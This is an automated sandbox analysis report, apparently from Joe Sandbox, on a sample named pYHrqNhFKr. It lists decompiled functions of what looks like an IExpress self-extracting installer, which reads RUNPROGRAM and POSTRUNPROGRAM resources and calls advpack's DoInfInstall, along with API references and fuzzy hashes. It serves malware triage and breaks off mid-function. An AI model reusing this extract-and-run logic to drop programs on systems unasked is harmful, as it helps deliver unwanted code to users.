C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 008A4851

Memory Dump Source

Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: Local$Alloc$FreeLoadMessageString
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
API String ID: 359063898-388467436
Opcode ID: 98b7e73fe975ffc2e5c366a30238492d11816e3ab17827eaaa109156de3e82ca
Instruction ID: 37d3da4ffb5434a5eb98a911196e94805450ee7e427de0d1e6eb31bba13223ae
Opcode Fuzzy Hash: 98b7e73fe975ffc2e5c366a30238492d11816e3ab17827eaaa109156de3e82ca
Instruction Fuzzy Hash: 2911C675604641AFFB189F38AC18F763B5AFBC7300B149529E982D7F41DA7A8C06C760

Uniqueness

Uniqueness Score: -1.00%

Function 008A3680 Relevance: 6.1, APIs: 4, Instructions: 51
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E008A3680(void* __ecx) {
				void* _v8;
				struct tagMSG _v36;
				int _t8;
				struct HWND__* _t16;

				_v8 = __ecx;
				_t16 = 0;
				while(1) {
					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
					if(_t8 == 0) {
						break;
					}
					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
						continue;
					} else {
						do {
							if(_v36.message != 0x12) {
								DispatchMessageA( &_v36);
							} else {
								_t16 = 1;
							}
							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
						} while (_t8 != 0);
						if(_t16 == 0) {
							continue;
						}
					}
					break;
				}
				return _t8;
			}

0x008a368c
0x008a368f
0x008a3691
0x008a369f
0x008a36a7
0x00000000
0x00000000
0x008a36ba
0x00000000
0x008a36bc
0x008a36bc
0x008a36c0
0x008a36cb
0x008a36c2
0x008a36c4
0x008a36c4
0x008a36da
0x008a36e0
0x008a36e6
0x00000000
0x00000000
0x008a36e6
0x00000000
0x008a36ba
0x008a36ed

APIs

MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 008A369F
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 008A36B2
DispatchMessageA.USER32(?), ref: 008A36CB
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 008A36DA

Memory Dump Source

Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: Message$Peek$DispatchMultipleObjectsWait
String ID:
API String ID: 2776232527-0
Opcode ID: e3c880f80f66ff8412f7ab98a37216a47024d137a6951f23bc70b0eb2ff5c988
Instruction ID: 28923b03fe383499cf3a8cfe4bd83cde5594cadcf0b9e340e1584e13f8e771ff
Opcode Fuzzy Hash: e3c880f80f66ff8412f7ab98a37216a47024d137a6951f23bc70b0eb2ff5c988
Instruction Fuzzy Hash: E001A7729002147BEF304BA65C48EEF767CFBD7B10F140119FA05E2580D660C640D660

Uniqueness

Uniqueness Score: -1.00%

Function 008A6517 Relevance: 6.1, APIs: 4, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E008A6517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
				struct HRSRC__* _t6;
				void* _t21;
				struct HINSTANCE__* _t23;
				int _t24;

				_t23 =  *0x8a9a3c; // 0x8a0000
				_t6 = FindResourceA(_t23, __edx, 5);
				if(_t6 == 0) {
					L6:
					E008A44B9(0, 0x4fb, 0, 0, 0x10, 0);
					_t24 = _a16;
				} else {
					_t21 = LoadResource(_t23, _t6);
					if(_t21 == 0) {
						goto L6;
					} else {
						if(_a12 != 0) {
							_push(_a12);
						} else {
							_push(0);
						}
						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
						FreeResource(_t21);
						if(_t24 == 0xffffffff) {
							goto L6;
						}
					}
				}
				return _t24;
			}

0x008a651f
0x008a652a
0x008a6534
0x008a656b
0x008a6577
0x008a657c
0x008a6536
0x008a653e
0x008a6542
0x00000000
0x008a6544
0x008a6547
0x008a654c
0x008a6549
0x008a6549
0x008a6549
0x008a655e
0x008a6560
0x008a6569
0x00000000
0x00000000
0x008a6569
0x008a6542
0x008a6587

APIs

FindResourceA.KERNEL32(008A0000,000007D6,00000005), ref: 008A652A
LoadResource.KERNEL32(008A0000,00000000,?,?,008A2EE8,00000000,008A19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 008A6538
DialogBoxIndirectParamA.USER32(008A0000,00000000,00000547,008A19E0,00000000), ref: 008A6557
FreeResource.KERNEL32(00000000,?,?,008A2EE8,00000000,008A19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 008A6560

Memory Dump Source

Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: Resource$DialogFindFreeIndirectLoadParam
String ID:
API String ID: 1214682469-0
Opcode ID: 503adc068073f6aa6f71304d95e5571ff671035770d893e9da15e5ef157533a0
Instruction ID: 71a694174ae9120c6f14bba76150c939e3c2d29d58593675fda99c83cada2a35
Opcode Fuzzy Hash: 503adc068073f6aa6f71304d95e5571ff671035770d893e9da15e5ef157533a0
Instruction Fuzzy Hash: 83012672500619BBFB105FA99C08DBB7A6DFF8B760F080125FE01D3954E7718C20C6A1

Uniqueness

Uniqueness Score: -1.00%

Function 008A65E8 Relevance: 6.0, APIs: 4, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E008A65E8(char* __ecx) {
				char _t3;
				char _t10;
				char* _t12;
				char* _t14;
				char* _t15;
				CHAR* _t16;

				_t12 = __ecx;
				_t15 = __ecx;
				_t14 =  &(__ecx[1]);
				_t10 = 0;
				do {
					_t3 =  *_t12;
					_t12 =  &(_t12[1]);
				} while (_t3 != 0);
				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
				while(1) {
					_t16 = CharPrevA(_t15, ??);
					if(_t16 <= _t15) {
						break;
					}
					if( *_t16 == 0x5c) {
						L7:
						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
							_t16 = CharNextA(_t16);
						}
						 *_t16 = _t10;
						_t10 = 1;
					} else {
						_push(_t16);
						continue;
					}
					L11:
					return _t10;
				}
				if( *_t16 == 0x5c) {
					goto L7;
				}
				goto L11;
			}

0x008a65e8
0x008a65ed
0x008a65ef
0x008a65f2
0x008a65f4
0x008a65f4
0x008a65f6
0x008a65f7
0x008a6608
0x008a6611
0x008a6618
0x008a661c
0x00000000
0x00000000
0x008a660e
0x008a6623
0x008a6625
0x008a663b
0x008a663b
0x008a663d
0x008a6641
0x008a6610
0x008a6610
0x00000000
0x008a6610
0x008a6644
0x008a6647
0x008a6647
0x008a6621
0x00000000
0x00000000
0x00000000

APIs

CharPrevA.USER32(?,00000000,00000000,00000001,00000000,008A2B33), ref: 008A6602
CharPrevA.USER32(?,00000000), ref: 008A6612
CharPrevA.USER32(?,00000000), ref: 008A6629
CharNextA.USER32(00000000), ref: 008A6635

Memory Dump Source

Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: Char$Prev$Next
String ID:
API String ID: 3260447230-0
Opcode ID: 55f4c6289112a1fa38efc575082a62782e811fdedaad557eb213e524cce11aa2
Instruction ID: a57ce0a9b44a944b0d9fc68dc9c567603d9d31281b94ada49eb200011aaef9a9
Opcode Fuzzy Hash: 55f4c6289112a1fa38efc575082a62782e811fdedaad557eb213e524cce11aa2
Instruction Fuzzy Hash: 26F0F4325041507EF7361B288C888BBBF9CFFA7254B2D01AFE492C2C05F7650D06C661

Uniqueness

Uniqueness Score: -1.00%

Function 008A69B0 Relevance: 6.0, APIs: 4, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E008A69B0() {
				intOrPtr* _t4;
				intOrPtr* _t5;
				void* _t6;
				intOrPtr _t11;
				intOrPtr _t12;

				 *0x8a81f8 = E008A6C70();
				__set_app_type(E008A6FBE(2));
				 *0x8a88a4 =  *0x8a88a4 | 0xffffffff;
				 *0x8a88a8 =  *0x8a88a8 | 0xffffffff;
				_t4 = __p__fmode();
				_t11 =  *0x8a8528; // 0x0
				 *_t4 = _t11;
				_t5 = __p__commode();
				_t12 =  *0x8a851c; // 0x0
				 *_t5 = _t12;
				_t6 = E008A7000();
				if( *0x8a8000 == 0) {
					__setusermatherr(E008A7000);
				}
				E008A71EF(_t6);
				return 0;
			}

0x008a69b7
0x008a69c2
0x008a69c8
0x008a69cf
0x008a69d8
0x008a69de
0x008a69e4
0x008a69e6
0x008a69ec
0x008a69f2
0x008a69f4
0x008a6a00
0x008a6a07
0x008a6a0d
0x008a6a0e
0x008a6a15

APIs

Part of subcall function 008A6FBE: GetModuleHandleW.KERNEL32(00000000), ref: 008A6FC5

__set_app_type.MSVCRT ref: 008A69C2
__p__fmode.MSVCRT ref: 008A69D8
__p__commode.MSVCRT ref: 008A69E6
__setusermatherr.MSVCRT ref: 008A6A07

Memory Dump Source

Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
String ID:
API String ID: 1632413811-0
Opcode ID: a29fd141f7c17777752b5a121d94f109393bdaa8c3ff92293ab666e6ee24ce02
Instruction ID: 1620df4af1bd3def111741d16505f0f52e09cd3d9a6df45ceb8b94d3446b19a1
Opcode Fuzzy Hash: a29fd141f7c17777752b5a121d94f109393bdaa8c3ff92293ab666e6ee24ce02
Instruction Fuzzy Hash: 41F0F270508301CFF758AB38ED0A7083BA1FB07331B150619E862C6EE0EF3E8561CA22

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: niba6073.exePID: 2968, Parent PID: 2980COMMON

Execution Graph

Execution Coverage:	28.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	960
Total number of Limit Nodes:	25

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00073BA2 Relevance: 40.6, APIs: 11, Strings: 12, Instructions: 308
libraryloaderCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00073BA2() {
				signed int _v8;
				signed int _v12;
				char _v276;
				char _v280;
				short _v300;
				intOrPtr _v304;
				void _v348;
				char _v352;
				intOrPtr _v356;
				signed int _v360;
				short _v364;
				char* _v368;
				intOrPtr _v372;
				void* _v376;
				intOrPtr _v380;
				char _v384;
				signed int _v388;
				intOrPtr _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				void* _v408;
				void* _v424;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t69;
				signed int _t76;
				void* _t77;
				signed int _t79;
				short _t96;
				signed int _t97;
				intOrPtr _t98;
				signed int _t101;
				signed int _t104;
				signed int _t108;
				int _t112;
				void* _t115;
				signed char _t118;
				void* _t125;
				signed int _t127;
				void* _t128;
				struct HINSTANCE__* _t129;
				void* _t130;
				short _t137;
				char* _t140;
				signed char _t144;
				signed char _t145;
				signed int _t149;
				void* _t150;
				void* _t151;
				signed int _t153;
				void* _t155;
				void* _t156;
				signed int _t157;
				signed int _t162;
				signed int _t164;
				void* _t165;

				_t164 = (_t162 & 0xfffffff8) - 0x194;
				_t69 =  *0x78004; // 0xa87cf02e
				_v8 = _t69 ^ _t164;
				_t153 = 0;
				 *0x79124 =  *0x79124 & 0;
				_t149 = 0;
				_v388 = 0;
				_v384 = 0;
				_t165 =  *0x78a28 - _t153; // 0x0
				if(_t165 != 0) {
					L3:
					_t127 = 0;
					_v392 = 0;
					while(1) {
						_v400 = _v400 & 0x00000000;
						memset( &_v348, 0, 0x44);
						_t164 = _t164 + 0xc;
						_v348 = 0x44;
						if( *0x78c42 != 0) {
							goto L26;
						}
						_t146 =  &_v396;
						_t115 = E0007468F("SHOWWINDOW",  &_v396, 4);
						if(_t115 == 0 || _t115 > 4) {
							L25:
							_t146 = 0x4b1;
							E000744B9(0, 0x4b1, 0, 0, 0x10, 0);
							 *0x79124 = 0x80070714;
							goto L62;
						} else {
							if(_v396 != 1) {
								__eflags = _v396 - 2;
								if(_v396 != 2) {
									_t137 = 3;
									__eflags = _v396 - _t137;
									if(_v396 == _t137) {
										_v304 = 1;
										_v300 = _t137;
									}
									goto L14;
								}
								_push(6);
								_v304 = 1;
								_pop(0);
								goto L11;
							} else {
								_v304 = 1;
								L11:
								_v300 = 0;
								L14:
								if(_t127 != 0) {
									L27:
									_t155 = 1;
									__eflags = _t127 - 1;
									if(_t127 != 1) {
										L31:
										_t132 =  &_v280;
										_t76 = E00071AE8( &_v280,  &_v408,  &_v404); // executed
										__eflags = _t76;
										if(_t76 == 0) {
											L62:
											_t77 = 0;
											L63:
											_pop(_t150);
											_pop(_t156);
											_pop(_t128);
											return E00076CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
										}
										_t157 = _v404;
										__eflags = _t149;
										if(_t149 != 0) {
											L37:
											__eflags = _t157;
											if(_t157 == 0) {
												L57:
												_t151 = _v408;
												_t146 =  &_v352;
												_t130 = _t151; // executed
												_t79 = E00073FEF(_t130,  &_v352); // executed
												__eflags = _t79;
												if(_t79 == 0) {
													L61:
													LocalFree(_t151);
													goto L62;
												}
												L58:
												LocalFree(_t151);
												_t127 = _t127 + 1;
												_v396 = _t127;
												__eflags = _t127 - 2;
												if(_t127 >= 2) {
													_t155 = 1;
													__eflags = 1;
													L69:
													__eflags =  *0x78580;
													if( *0x78580 != 0) {
														E00072267();
													}
													_t77 = _t155;
													goto L63;
												}
												_t153 = _v392;
												_t149 = _v388;
												continue;
											}
											L38:
											__eflags =  *0x78180;
											if( *0x78180 == 0) {
												_t146 = 0x4c7;
												E000744B9(0, 0x4c7, 0, 0, 0x10, 0);
												LocalFree(_v424);
												 *0x79124 = 0x8007042b;
												goto L62;
											}
											__eflags = _t157;
											if(_t157 == 0) {
												goto L57;
											}
											__eflags =  *0x79a34 & 0x00000004;
											if(__eflags == 0) {
												goto L57;
											}
											_t129 = E00076495(_t127, _t132, _t157, __eflags);
											__eflags = _t129;
											if(_t129 == 0) {
												_t146 = 0x4c8;
												E000744B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
												L65:
												LocalFree(_v408);
												 *0x79124 = E00076285();
												goto L62;
											}
											_t146 = GetProcAddress(_t129, "DoInfInstall");
											_v404 = _t146;
											__eflags = _t146;
											if(_t146 == 0) {
												_t146 = 0x4c9;
												__eflags = 0;
												E000744B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
												FreeLibrary(_t129);
												goto L65;
											}
											__eflags =  *0x78a30;
											_t151 = _v408;
											_v384 = 0;
											_v368 =  &_v280;
											_t96 =  *0x79a40; // 0x3
											_v364 = _t96;
											_t97 =  *0x78a38 & 0x0000ffff;
											_v380 = 0x79154;
											_v376 = _t151;
											_v372 = 0x791e4;
											_v360 = _t97;
											if( *0x78a30 != 0) {
												_t97 = _t97 | 0x00010000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t144 =  *0x79a34; // 0x1
											__eflags = _t144 & 0x00000008;
											if((_t144 & 0x00000008) != 0) {
												_t97 = _t97 | 0x00020000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t144 & 0x00000010;
											if((_t144 & 0x00000010) != 0) {
												_t97 = _t97 | 0x00040000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t145 =  *0x78d48; // 0x0
											__eflags = _t145 & 0x00000040;
											if((_t145 & 0x00000040) != 0) {
												_t97 = _t97 | 0x00080000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t145;
											if(_t145 < 0) {
												_t104 = _t97 | 0x00100000;
												__eflags = _t104;
												_v360 = _t104;
											}
											_t98 =  *0x79a38; // 0x0
											_v356 = _t98;
											_t130 = _t146;
											 *0x7a288( &_v384);
											_t101 = _v404();
											__eflags = _t164 - _t164;
											if(_t164 != _t164) {
												_t130 = 4;
												asm("int 0x29");
											}
											 *0x79124 = _t101;
											_push(_t129);
											__eflags = _t101;
											if(_t101 < 0) {
												FreeLibrary();
												goto L61;
											} else {
												FreeLibrary();
												_t127 = _v400;
												goto L58;
											}
										}
										__eflags =  *0x79a40 - 1; // 0x3
										if(__eflags == 0) {
											goto L37;
										}
										__eflags =  *0x78a20;
										if( *0x78a20 == 0) {
											goto L37;
										}
										__eflags = _t157;
										if(_t157 != 0) {
											goto L38;
										}
										_v388 = 1;
										E0007202A(_t146); // executed
										goto L37;
									}
									_t146 =  &_v280;
									_t108 = E0007468F("POSTRUNPROGRAM",  &_v280, 0x104);
									__eflags = _t108;
									if(_t108 == 0) {
										goto L25;
									}
									__eflags =  *0x78c42;
									if( *0x78c42 != 0) {
										goto L69;
									}
									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
									__eflags = _t112 == 0;
									if(_t112 == 0) {
										goto L69;
									}
									goto L31;
								}
								_t118 =  *0x78a38; // 0x0
								if(_t118 == 0) {
									L23:
									if(_t153 != 0) {
										goto L31;
									}
									_t146 =  &_v276;
									if(E0007468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
										goto L27;
									}
									goto L25;
								}
								if((_t118 & 0x00000001) == 0) {
									__eflags = _t118 & 0x00000002;
									if((_t118 & 0x00000002) == 0) {
										goto L62;
									}
									_t140 = "USRQCMD";
									L20:
									_t146 =  &_v276;
									if(E0007468F(_t140,  &_v276, 0x104) == 0) {
										goto L25;
									}
									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
										_t153 = 1;
										_v388 = 1;
									}
									goto L23;
								}
								_t140 = "ADMQCMD";
								goto L20;
							}
						}
						L26:
						_push(_t130);
						_t146 = 0x104;
						E00071781( &_v276, 0x104, _t130, 0x78c42);
						goto L27;
					}
				}
				_t130 = "REBOOT";
				_t125 = E0007468F(_t130, 0x79a2c, 4);
				if(_t125 == 0 || _t125 > 4) {
					goto L25;
				} else {
					goto L3;
				}
			}

0x00073baa
0x00073bb0
0x00073bb7
0x00073bc0
0x00073bc2
0x00073bc9
0x00073bcb
0x00073bcf
0x00073bd3
0x00073bd9
0x00073bfd
0x00073bfd
0x00073bff
0x00073c03
0x00073c03
0x00073c11
0x00073c16
0x00073c19
0x00073c28
0x00000000
0x00000000
0x00073c30
0x00073c39
0x00073c40
0x00073d13
0x00073d15
0x00073d21
0x00073d26
0x00000000
0x00073c4f
0x00073c56
0x00073c60
0x00073c65
0x00073c77
0x00073c78
0x00073c7c
0x00073c7e
0x00073c82
0x00073c82
0x00000000
0x00073c7c
0x00073c67
0x00073c69
0x00073c6d
0x00000000
0x00073c58
0x00073c58
0x00073c6e
0x00073c6e
0x00073c87
0x00073c89
0x00073d4d
0x00073d4f
0x00073d50
0x00073d52
0x00073d9e
0x00073da8
0x00073daf
0x00073db4
0x00073db6
0x00073f4d
0x00073f4d
0x00073f4f
0x00073f56
0x00073f57
0x00073f58
0x00073f63
0x00073f63
0x00073dbc
0x00073dc0
0x00073dc2
0x00073de6
0x00073de6
0x00073de8
0x00073f0b
0x00073f0b
0x00073f0f
0x00073f13
0x00073f15
0x00073f1a
0x00073f1c
0x00073f46
0x00073f47
0x00000000
0x00073f47
0x00073f1e
0x00073f1f
0x00073f25
0x00073f26
0x00073f2a
0x00073f2d
0x00073fd9
0x00073fd9
0x00073fda
0x00073fda
0x00073fe1
0x00073fe3
0x00073fe3
0x00073fe8
0x00000000
0x00073fe8
0x00073f33
0x00073f37
0x00000000
0x00073f37
0x00073dee
0x00073dee
0x00073df5
0x00073fad
0x00073fb9
0x00073fc2
0x00073fc8
0x00000000
0x00073fc8
0x00073dfb
0x00073dfd
0x00000000
0x00000000
0x00073e03
0x00073e0a
0x00000000
0x00000000
0x00073e15
0x00073e17
0x00073e19
0x00073f94
0x00073fa4
0x00073f7c
0x00073f80
0x00073f8b
0x00000000
0x00073f8b
0x00073e2c
0x00073e30
0x00073e34
0x00073e36
0x00073f69
0x00073f6e
0x00073f70
0x00073f76
0x00000000
0x00073f76
0x00073e3c
0x00073e43
0x00073e47
0x00073e52
0x00073e56
0x00073e5c
0x00073e61
0x00073e68
0x00073e70
0x00073e74
0x00073e7c
0x00073e80
0x00073e82
0x00073e82
0x00073e87
0x00073e87
0x00073e8b
0x00073e91
0x00073e94
0x00073e96
0x00073e96
0x00073e9b
0x00073e9b
0x00073e9f
0x00073ea2
0x00073ea4
0x00073ea4
0x00073ea9
0x00073ea9
0x00073ead
0x00073eb3
0x00073eb6
0x00073eb8
0x00073eb8
0x00073ebd
0x00073ebd
0x00073ec1
0x00073ec3
0x00073ec5
0x00073ec5
0x00073eca
0x00073eca
0x00073ece
0x00073ed5
0x00073ed9
0x00073ee0
0x00073ee6
0x00073eea
0x00073eec
0x00073eee
0x00073ef3
0x00073ef3
0x00073ef5
0x00073efa
0x00073efb
0x00073efd
0x00073f40
0x00000000
0x00073eff
0x00073eff
0x00073f05
0x00000000
0x00073f05
0x00073efd
0x00073dc7
0x00073dce
0x00000000
0x00000000
0x00073dd0
0x00073dd7
0x00000000
0x00000000
0x00073dd9
0x00073ddb
0x00000000
0x00000000
0x00073ddd
0x00073de1
0x00000000
0x00073de1
0x00073d59
0x00073d65
0x00073d6a
0x00073d6c
0x00000000
0x00000000
0x00073d6e
0x00073d75
0x00000000
0x00000000
0x00073d8f
0x00073d96
0x00073d98
0x00000000
0x00000000
0x00000000
0x00073d98
0x00073c8f
0x00073c98
0x00073cf1
0x00073cf3
0x00000000
0x00000000
0x00073cfe
0x00073d11
0x00000000
0x00000000
0x00000000
0x00073d11
0x00073c9c
0x00073ca5
0x00073ca7
0x00000000
0x00000000
0x00073cad
0x00073cb2
0x00073cb7
0x00073cc5
0x00000000
0x00000000
0x00073ce8
0x00073cec
0x00073ced
0x00073ced
0x00000000
0x00073ce8
0x00073c9e
0x00000000
0x00073c9e
0x00073c56
0x00073d35
0x00073d35
0x00073d3c
0x00073d48
0x00000000
0x00073d48
0x00073c03
0x00073be2
0x00073be7
0x00073bee
0x00000000
0x00000000
0x00000000
0x00000000

APIs

memset.MSVCRT ref: 00073C11
CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00073CDC

Part of subcall function 0007468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000746A0
Part of subcall function 0007468F: SizeofResource.KERNEL32(00000000,00000000,?,00072D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000746A9
Part of subcall function 0007468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000746C3
Part of subcall function 0007468F: LoadResource.KERNEL32(00000000,00000000,?,00072D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000746CC
Part of subcall function 0007468F: LockResource.KERNEL32(00000000,?,00072D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000746D3
Part of subcall function 0007468F: memcpy_s.MSVCRT ref: 000746E5
Part of subcall function 0007468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000746EF

CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00078C42), ref: 00073D8F
GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00073E26
FreeLibrary.KERNEL32(00000000,?,00078C42), ref: 00073EFF
LocalFree.KERNEL32(?,?,?,?,00078C42), ref: 00073F1F
FreeLibrary.KERNEL32(00000000,?,00078C42), ref: 00073F40
LocalFree.KERNEL32(?,?,?,?,00078C42), ref: 00073F47
FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00078C42), ref: 00073F76
LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00078C42), ref: 00073F80
LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00078C42), ref: 00073FC2

Strings

USRQCMD, xrefs: 00073CAD
ADMQCMD, xrefs: 00073C9E
<None>, xrefs: 00073CC9, 00073D7D
advpack.dll, xrefs: 00073F9D
POSTRUNPROGRAM, xrefs: 00073D60
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00073E74
DoInfInstall, xrefs: 00073E1F, 00073E24, 00073F68
SHOWWINDOW, xrefs: 00073C34
siga30, xrefs: 00073E68
D, xrefs: 00073C19
REBOOT, xrefs: 00073BE2
RUNPROGRAM, xrefs: 00073D05

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$siga30
API String ID: 1032054927-3161088270
Opcode ID: 14f6604465fff4caa6c5983ef388c0abc65fd8f8180207c47784bf6774d33679
Instruction ID: e798be6d1f7e7274de351bd8d4c9582df3368b39356f805233457068ea16a10b
Opcode Fuzzy Hash: 14f6604465fff4caa6c5983ef388c0abc65fd8f8180207c47784bf6774d33679
Instruction Fuzzy Hash: C7B1F070E083419BF3709F249845BAB76E4EB85740F00C929FA8DE61D1DB7C8981DB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00071AE8 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 291
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00071AE8(long __ecx, CHAR** _a4, int* _a8) {
				signed int _v8;
				char _v268;
				char _v527;
				char _v528;
				char _v1552;
				CHAR* _v1556;
				int* _v1560;
				CHAR** _v1564;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t48;
				CHAR* _t53;
				CHAR* _t54;
				char* _t57;
				char* _t58;
				CHAR* _t60;
				void* _t62;
				signed char _t65;
				intOrPtr _t76;
				intOrPtr _t77;
				unsigned int _t85;
				CHAR* _t90;
				CHAR* _t92;
				char _t105;
				char _t106;
				CHAR** _t111;
				CHAR* _t115;
				intOrPtr* _t125;
				void* _t126;
				CHAR* _t132;
				CHAR* _t135;
				void* _t138;
				void* _t139;
				void* _t145;
				intOrPtr* _t146;
				char* _t148;
				CHAR* _t151;
				void* _t152;
				CHAR* _t155;
				CHAR* _t156;
				void* _t157;
				signed int _t158;

				_t48 =  *0x78004; // 0xa87cf02e
